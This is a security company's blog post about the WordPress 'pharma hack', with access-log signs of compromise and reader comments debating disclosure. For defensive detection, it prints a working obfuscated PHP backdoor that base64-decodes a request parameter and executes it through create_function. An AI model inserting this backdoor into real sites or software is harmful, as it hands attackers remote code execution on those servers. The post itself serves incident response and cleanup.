Pharma hack and their C&C (Command & control) server

A large portion of the sites Sucuri has been fixing in recent weeks are stemming from infections caused by the infamous Pharma Hack. We posted a detailed document explaining how to fix it and clean the attack:

Understanding and cleaning the pharma hack on WordPress

One thing we’ve noticed on all sites affected so far is that all of them have been receiving commands from this IP address: (

If your site has been affected you can double check your access.log for these entries: – – [31/Jul/2010:06:07:59 -0700] “POST /wp-content/themes/classic/sidebar.php HTTP/1.1” 500 374 “-” “-” – – [31/Jul/2010:06:08:30 -0700] “POST /wp-content/themes/classic/sidebar.php HTTP/1.1” 500 447 “-” “-” – – [31/Jul/2010:11:06:55 -0700] “POST /wp-content/themes/classic/sidebar.php HTTP/1.1” 500 444 “-” “-” – – [30/Jul/2010:12:57:41 -0700] “POST /wp-content/themes/classic/comments.php HTTP/1.1” 200 202 “-” “-”

This IP is hosted at Blueconnex and even after tons of abuse reports (from multiple sources), the’ve sat idle.

$ whois
descr: Blueconnex Networks Ltd
origin: AS29550

$ whois
Icarus Kann Team
Icarus Kann (
Tel. +210.9882728

Requests from the IP address try to access a backdoor they’ve inserted inside the /themes directory (generally sidebar.php, comments.php, 404.php, etc). This is what the backdoor looks like (all in one line):

< ?php $a = ‘m’.’d5′;
{$w = ‘Cdbl0sYoWOiyJt3qtqyOoqxA’;$x = $_REQUEST[$w];
$y = ‘base’.’6′;$y.= ‘4_d’.’ecode’;$x = $y($x);$z = ‘creat’.’e_f’;
$z.= ‘unction’;$x = $z(”,$x);$x();} ?>

If your site is hacked and it keeps getting reinfected, look for this backdoor.

Once that file is called, it re-uploads another script into the /plugins directory and inserts new entries in the DB. Our friend W. Andrew Loe III did a good analysis of this attack and found how it works in detail (he was able to decode all the files in his honeypot).

That’s the first file the attackers uploaded to hack everything:

You see that it reads wp-config.php, creates a new plugin and activates it. This is the file added to the plugins:

This one is executed as well:

So a very interesting and complex attack they’ve managed to pull off. Many sites are still infected, so they probably have a large number of sites under their control.

If your site is infected and you need help, contact us. We’ll get your site cleaned up and malware-free right away.

Protect your interwebs!

  1. So you are saying they've distributed free themes with a backdoor built in?

    Sneaky, clever and very dangerous.

    As with all plugins and themes that you upload (to any system) we should be scanning the code for anything that doesn't look right. But realistically… the vast majority of users don't and can't.

    I'd start with those encrypted footers. I understand why they are there… but as you've shown the backdoor isn't a big script so script size isn't an danger indicator.

    1. Great comments Sarah, thanks!

      To clarify, it is in fact affecting themes, as well as plugins. There is no indication they've distributed exploited themes or plugins, although it is possible.


    1. Nathan, thanks for the comment. We're not posting anything not already publicly available. In fact, we've cleaned 100's of 1000's of sites infected with this specific exploit. Most of these sites are either indexed on Google with this garbarge or easily found via complaints on Twitter.

      The idea here is to try and explain what is going on as we get more details. If we can get out (specifically to hosting providers) information which leads to killing this thing off, or at minimum slowing it down, then we're on the right track. For now, we'll continue to posting relevant information as often as possible.

      Hope this helps.


      1. Do you remember a CIH virus?
        It's author was arrested in september 2000, but the virus source code leaked to the public. There where a lot of modifications of virus even after three years!
        I think it's better not to publish the whole code, but the parts that can help people to identify it. You can provide the full source to authorized security professionals, that may want to learn it.
        In my opinion that security professionals must be more responsible and don't provide ready to use tools to hacker community. There are not so much hardcore hackers, but hundreds of skript kiddies and inexperienced hacker groups.
        I was hit by another type of pharma hack- it was relatively easy to clean. Their files was uploaded manually (by hand) using c99 shell and the php file was included in my index.php.
        What i am afraid of… if there are more then one group that plays with pharma hack – they will gain immediate level-up after reading your article. So in a month we will get a lot of similar hacks on modified codebase. Who will be responsible for that?

  2. Is the original source of this attack known? I’m cleaning up a client’s site, found all pieces of the puzzle that I’ve seen around the web, but want to make sure it doesn’t come back. Very very sneaky attack.

Comments are closed.

You May Also Like